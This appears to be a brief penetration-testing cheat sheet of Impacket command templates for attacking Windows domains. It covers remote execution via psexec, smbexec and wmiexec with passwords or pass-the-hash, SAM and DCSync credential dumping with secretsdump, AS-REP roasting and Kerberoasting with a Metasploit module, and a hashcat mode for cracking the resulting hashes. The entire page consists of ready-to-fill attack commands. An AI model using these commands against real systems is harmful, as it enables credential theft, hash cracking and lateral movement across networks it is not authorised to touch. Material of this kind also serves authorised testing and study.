impacket guide
psexec | smbexec | wmiexec
impacket-psexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-smbexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-wmiexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
secretsdump (dumps SAM / DCSync)
impacket-secretsdump DOMAIN/USER:['PASS']@IP [-just-dc] [just-dc-user USER]
# -just-dc: if IP is a domain-controller
GetNPUsers
AS-REP Roasting (users with Kerberos pre-authentication disabled)
impacket-GetNPUsers DOMAIN/ -usersfile user.txt [-format hashcat] [-outputfile hash]
impacket-GetNPUsers DOMAIN/USER -no-pass -dc-ip IP [-format hashcat]
impacket-GetNPUsers -dc-ip IP -request DOMAIN/
GetUserSPNs
Requesting TGTs for services to get all hashes
msf:
use auxiliary/gather/get_user_spns
impacket-GetUserSPNs DOMAIN/USER -hashes LM:NTLM_HASH -dc-ip DC_IP -request -outputfile hashes.kerberoast
impacket-GetUserSPNs DOMAIN/USER:['PASS'] -dc-ip DC_IP -request
# hashcat -m 13100
Last updated
Was this helpful?